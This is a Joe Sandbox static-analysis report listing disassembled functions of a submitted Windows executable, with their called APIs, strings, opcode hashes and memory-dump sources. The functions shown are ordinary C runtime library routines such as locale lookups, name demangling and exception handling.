Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 425d8eb645f09d12c53f6ff6a034ecfdd7d842ab210877b274d02d920be119c9
Instruction ID: 3611590eaf48bad423e7211205313c19ddab11e84583195506c353877f0997c7
Opcode Fuzzy Hash: 425d8eb645f09d12c53f6ff6a034ecfdd7d842ab210877b274d02d920be119c9
Instruction Fuzzy Hash: AEE02B3850070096D7302F179D02F53F1E59FF3B00F14442FB559425A2D9BD8440966A

Function 004A2792 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 004A27A5

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: 97994f0c1d4b3415b3339e376d0226a054a20ca7b7768547bad54e199d641de7
Instruction ID: 8f01044d1a71afb36744805b1539b43c1d31c607a365b33d49295efba8bc3dd8
Opcode Fuzzy Hash: 97994f0c1d4b3415b3339e376d0226a054a20ca7b7768547bad54e199d641de7
Instruction Fuzzy Hash: 02E0C23A418612DFD324CF2CD480A56B7E4EF55324B24892FE4E587690E771A995CB04

Non-executed Functions

Function 004CFA54 Relevance: 55.5, APIs: 25, Strings: 6, Instructions: 1201COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 004CFAA2
operator+.LIBVCRUNTIME ref: 004CFABC
DName::operator+.LIBCMT ref: 004CFBEA
DName::operator+.LIBCMT ref: 004CFC07

Part of subcall function 004D0E20: DName::DName.LIBVCRUNTIME ref: 004D0E63

DName::operator+.LIBCMT ref: 004CFCBB
DName::operator+.LIBCMT ref: 004CFCCA

Part of subcall function 004D55A0: DName::operator+.LIBCMT ref: 004D55E4
Part of subcall function 004D55A0: DName::operator+.LIBCMT ref: 004D55F0
Part of subcall function 004D55A0: DName::operator+.LIBCMT ref: 004D566B
Part of subcall function 004D55A0: DName::operator+=.LIBCMT ref: 004D56AE

DName::operator+.LIBCMT ref: 004CFC56

Part of subcall function 004CF812: DName::operator=.LIBVCRUNTIME ref: 004CF833

Part of subcall function 004CF7BA: shared_ptr.LIBCMT ref: 004CF7D6

Part of subcall function 004D151C: shared_ptr.LIBCMT ref: 004D15C2

DName::operator+.LIBCMT ref: 004D0234
DName::operator+.LIBCMT ref: 004D0250
DName::operator+.LIBCMT ref: 004D04EF

Part of subcall function 004CF6A9: DName::operator+.LIBCMT ref: 004CF6CA

Strings

T`R, xrefs: 004D0070
\`R, xrefs: 004CFF81
T`R, xrefs: 004CFC45, 004CFC4F
k[M, xrefs: 004CFA78, 004CFAB7, 004CFE99, 004D01CB
/, xrefs: 004D0398
k[M, xrefs: 004CFFA9, 004CFFAC

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Name::operator+$NameName::shared_ptr$Name::operator+=Name::operator=operator+
String ID: /$T`R$T`R$\`R$k[M$k[M
API String ID: 848932493-3463276232
Opcode ID: 20078ce0e1b4e90717bada16c467c21055e48e7d249183e4657e5ee9ba3e13c8
Instruction ID: 7eea5d3be06c763296d7fe51e90be933863e872a41a8633fbe0aef487709b1fc
Opcode Fuzzy Hash: 20078ce0e1b4e90717bada16c467c21055e48e7d249183e4657e5ee9ba3e13c8
Instruction Fuzzy Hash: 20928DB6E106199BEB14DFA9DCA5BEE77B5AB14304F04413FE502E7380DB6CD9098B18

Function 00517ABC Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00517CA0

Strings

1#IND, xrefs: 00517BC1
1#QNAN, xrefs: 00517BCF
1#INF, xrefs: 00517BF2
1#SNAN, xrefs: 00517BC8

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: ccaa638bc7446357431f1ed9bff4a6d836b959c4e2f2e427db243005ab3baf85
Instruction ID: f9cbac02e9c84c1c56b9c541339ead733c4c3bea705ca37d4fbecf0e546a7665
Opcode Fuzzy Hash: ccaa638bc7446357431f1ed9bff4a6d836b959c4e2f2e427db243005ab3baf85
Instruction Fuzzy Hash: 32D20A71E086298BEB75CE28DD447EABBB5FB58304F1445EAD40DA7240DB38AEC58F41

Function 0051328B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,005135A9,00000002,00000000,?,?,?,005135A9,?,00000000), ref: 00513324
GetLocaleInfoW.KERNEL32(?,20001004,005135A9,00000002,00000000,?,?,?,005135A9,?,00000000), ref: 0051334D
GetACP.KERNEL32(?,?,005135A9,?,00000000), ref: 00513362

Strings

OCP, xrefs: 005132DF
ACP, xrefs: 005132A9

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: fcba7c4e56ae5f8f3289e57ca9daab46a693c8b5d2eb36293cedf21868a7bdee
Instruction ID: 20337f840c9a2ef76ebefbe54f1a770376dd8bf0e62c4a127a5b2d453bfd330d
Opcode Fuzzy Hash: fcba7c4e56ae5f8f3289e57ca9daab46a693c8b5d2eb36293cedf21868a7bdee
Instruction Fuzzy Hash: F121D666700200AAFB349F18C911ADB7EA6BF64B20B568964E919DB200EB32DFC1C354

Function 00513460 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00504923: GetLastError.KERNEL32(?,?,004D64AA,005326E8,0000000C), ref: 00504927
Part of subcall function 00504923: SetLastError.KERNEL32(00000000), ref: 005049C9

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0051356C
IsValidCodePage.KERNEL32(00000000), ref: 005135B5
IsValidLocale.KERNEL32(?,00000001), ref: 005135C4
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0051360C
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0051362B

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 1323d61393928cdd1b4b4ad71252a89da6457197a18c236db67315350c872a67
Instruction ID: 4d0fa876aa25437edd9b1ab248c2b5b0506bae43c7530f5f65c1d869ab007f1d
Opcode Fuzzy Hash: 1323d61393928cdd1b4b4ad71252a89da6457197a18c236db67315350c872a67
Instruction Fuzzy Hash: 83519F71A0020AABFB20DFA5CC55AFE7BB9BF59B00F050569E901E7190E7749A84CB61

Function 00512ADE Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00504923: GetLastError.KERNEL32(?,?,004D64AA,005326E8,0000000C), ref: 00504927
Part of subcall function 00504923: SetLastError.KERNEL32(00000000), ref: 005049C9

GetACP.KERNEL32(?,?,?,?,?,?,00500DA5,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00512B9F
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00500DA5,?,?,?,00000055,?,-00000050,?,?), ref: 00512BCA
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00512D2D

Strings

utf8, xrefs: 00512C9C

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: 70f66a4b5fc8fc43f280e734cd7aae5c4e643cd83ece486af8652a511212e304
Instruction ID: e9d1b369ee4c4afbfade18aba4dd492ee8dd24120adc04b8e28e632d4f3ee0ed
Opcode Fuzzy Hash: 70f66a4b5fc8fc43f280e734cd7aae5c4e643cd83ece486af8652a511212e304
Instruction Fuzzy Hash: 65710A71604206AAFB24AF74DC46BEA7BA8FF55304F144829FA06D7181EB74DDA0C7A0

Function 0050BC81 Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0050BD0E

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 41121a43c8b4316fbc93a0923f665aead4128913ea77692f86a888a6ce872ba0
Instruction ID: 2d34897846d6edfce9e90e0efe4d99b1b11a67f20fe7bde8835d56e54f68caaa
Opcode Fuzzy Hash: 41121a43c8b4316fbc93a0923f665aead4128913ea77692f86a888a6ce872ba0
Instruction Fuzzy Hash: 0FB113729042569FFB158F68C8C1BFEBFA9FF55300F15856AE905AB281D3349D01CBA0

Function 0050EC61 Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 0050ECFC
FindNextFileW.KERNEL32(00000000,?), ref: 0050ED77
FindClose.KERNEL32(00000000), ref: 0050ED99
FindClose.KERNEL32(00000000), ref: 0050EDBC

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 5715c291918da15e03767e23cb0c40d0e806bb8ea716f6798c588ed36c282603
Instruction ID: 01fe6d8a9ce446367cec3a78e6d5b6970dbf676005f4d5be10191255a4f108c4
Opcode Fuzzy Hash: 5715c291918da15e03767e23cb0c40d0e806bb8ea716f6798c588ed36c282603
Instruction Fuzzy Hash: A441B572A00119AFDB30DF64DD8EDAEBB79FF95305F244999E405971C0EA309E84CB50

Function 004C8CC0 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 004C8CCC
IsDebuggerPresent.KERNEL32 ref: 004C8D98
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004C8DB1
UnhandledExceptionFilter.KERNEL32(?), ref: 004C8DBB

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 1395f42e52c0c36c088b8706ee42c16a85941882fb17ae8460315644aaeaca16
Instruction ID: 8f97ebaad777742b105310b16eb635f13f5d2b30a75c00631737f2ed41f1f8f0
Opcode Fuzzy Hash: 1395f42e52c0c36c088b8706ee42c16a85941882fb17ae8460315644aaeaca16
Instruction Fuzzy Hash: 73314779D0121C9BDB60DFA1D849BCDBBB8AF08304F1040AEE40DAB250EB749B85CF59

Function 004A624D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,?,00000002), ref: 004A6261
FormatMessageA.KERNEL32(00001300,00000000,?,?,?,00000000,00000000), ref: 004A6288

Strings

!x-sys-default-locale, xrefs: 004A625C

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: 5a2c5eadbd5f85979cd43b657e3692069a4db739ff009ab660e5d4303d4536d3
Instruction ID: 25f8ca8c1fe8c8f386b2c7dba7fb1c742d1b82993b9030014f4e1798aa5631a7
Opcode Fuzzy Hash: 5a2c5eadbd5f85979cd43b657e3692069a4db739ff009ab660e5d4303d4536d3
Instruction Fuzzy Hash: 77F030B6610104FFEF18AB95EC0AEBB7ABCEF1A394B004059B601D6150E2B4AF009B71

Function 00512F0F Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00504923: GetLastError.KERNEL32(?,?,004D64AA,005326E8,0000000C), ref: 00504927
Part of subcall function 00504923: SetLastError.KERNEL32(00000000), ref: 005049C9

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00512F63
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00512FAD
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00513073

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 4c49af9c23735f780aac2e94f0713d0021480a54f6cd3bfb16ff91ad469754ca
Instruction ID: fd28241dc16296385009c7bdd6f31bb5dbc85d7fc83ac5c4a4e948191a520fdb
Opcode Fuzzy Hash: 4c49af9c23735f780aac2e94f0713d0021480a54f6cd3bfb16ff91ad469754ca
Instruction Fuzzy Hash: 6D619171940107ABEF289F25CD96BEABBA8FF48710F104179E905C6285FB38DE94CB50

Function 004D6B07 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 004D6BFF
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 004D6C09
UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 004D6C16

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: bfec4250ffb83ae02143f51bdcd805a2c96d23a1feb43fa37865e76c4bacbba4
Instruction ID: 54fea1679c39e126ceb985211551c66fe216f13d1fcc82125a5678565b269766
Opcode Fuzzy Hash: bfec4250ffb83ae02143f51bdcd805a2c96d23a1feb43fa37865e76c4bacbba4
Instruction Fuzzy Hash: B431E57491122CABCB61DF29D889BCDBBB4BF58314F5041DAE40CA7250EB349F858F48

Function 00512DE9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00504923: GetLastError.KERNEL32(?,?,004D64AA,005326E8,0000000C), ref: 00504927
Part of subcall function 00504923: SetLastError.KERNEL32(00000000), ref: 005049C9

EnumSystemLocalesW.KERNEL32(00512F0F,00000001,00000000,?,-00000050,?,00513540,00000000,?,?,?,00000055,?), ref: 00512E5B

Strings

@5Q, xrefs: 00512E30

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID: @5Q
API String ID: 2417226690-830928646
Opcode ID: 4b08594f3f1974c5276d50b986470596ac08fe21377bd530c9809a07205dfcf0
Instruction ID: a601cf98ec56cdf70a0c22e9913e351e36497a58d9b36f91c40f60b48e516bb7
Opcode Fuzzy Hash: 4b08594f3f1974c5276d50b986470596ac08fe21377bd530c9809a07205dfcf0
Instruction Fuzzy Hash: 1011E53A2007055FEB18AF39C8916BABBA6FF80358F14452CE98687A40D775B993CB40

Function 004DFCD0 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f33a17b835cd9a1700cecc97aea1119a1d0ced0727f4e307ad7951a1de1bdd8e
Instruction ID: b705dbdab7283f33394aa4242f8e55bf690c5f0b02e86f84e443b31f6aab0fbe
Opcode Fuzzy Hash: f33a17b835cd9a1700cecc97aea1119a1d0ced0727f4e307ad7951a1de1bdd8e
Instruction Fuzzy Hash: 64F17E71E002199FDF14CF69D8806AEF7B1FF88314F15826EE825AB391D7349D458B94

Function 004F41F4 Relevance: 2.9, Strings: 2, Instructions: 388COMMON

Download Yara Rule

Strings

U"N, xrefs: 004F4561
0, xrefs: 004F4389

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID: 0$U"N
API String ID: 0-351449374
Opcode ID: 38d119b67b9f487715ae79881923a316b2565381b5d372fcb7153f502d2cd6f4
Instruction ID: 3c82762547ee6637b7d267c69828ba6f4f0052f16b48367ab5bb4f3a8323ce95
Opcode Fuzzy Hash: 38d119b67b9f487715ae79881923a316b2565381b5d372fcb7153f502d2cd6f4
Instruction Fuzzy Hash: 22E1BE306006098FCB24DF68C480A7FB7F1BF85314B25465EEA56AB790DB38AD46CB59

Function 004F2CFD Relevance: 2.8, Strings: 2, Instructions: 344COMMONLIBRARYCODE

Download Yara Rule

Strings

N, xrefs: 004F2FC4, 004F2FE6, 004F2FCA, 004F2FF3
0N, xrefs: 004F2F29, 004F2F2F

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID:
String ID: 0N$N
API String ID: 0-1270383139
Opcode ID: c25b19105cacaa606a999afeb9ffa88088bcd215c17c5c6e22a596a6b021d6e1
Instruction ID: 2df2c0afaf0260071e764c261f32ac5c6fee64c99910e84815638420f2be2d0f
Opcode Fuzzy Hash: c25b19105cacaa606a999afeb9ffa88088bcd215c17c5c6e22a596a6b021d6e1
Instruction Fuzzy Hash: 50C1CF7060064E8FCB24CF28C69067FBBB1AF45304F24461FD6569B3A1C7B8AD46CB5A

Function 00516790 Relevance: 2.8, APIs: 1, Instructions: 1260COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0051680D

Memory Dump Source

Source File: 00000000.00000002.2240567700.00000000004A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000000.00000002.2240546196.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240626381.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.0000000000534000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240650770.000000000055A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240693129.000000000055D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a0000_w7kdnBzGat.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: 12d7842aaf3e170b4f7ef6b79e4bcbd9e23c756ff281c8a1dd178828a99acadd
Instruction ID: f6437a1e238b592cfc4400e51bc1a98d29ca51b72d11a1a6b0d3d31662b7815c
Opcode Fuzzy Hash: 12d7842aaf3e170b4f7ef6b79e4bcbd9e23c756ff281c8a1dd178828a99acadd
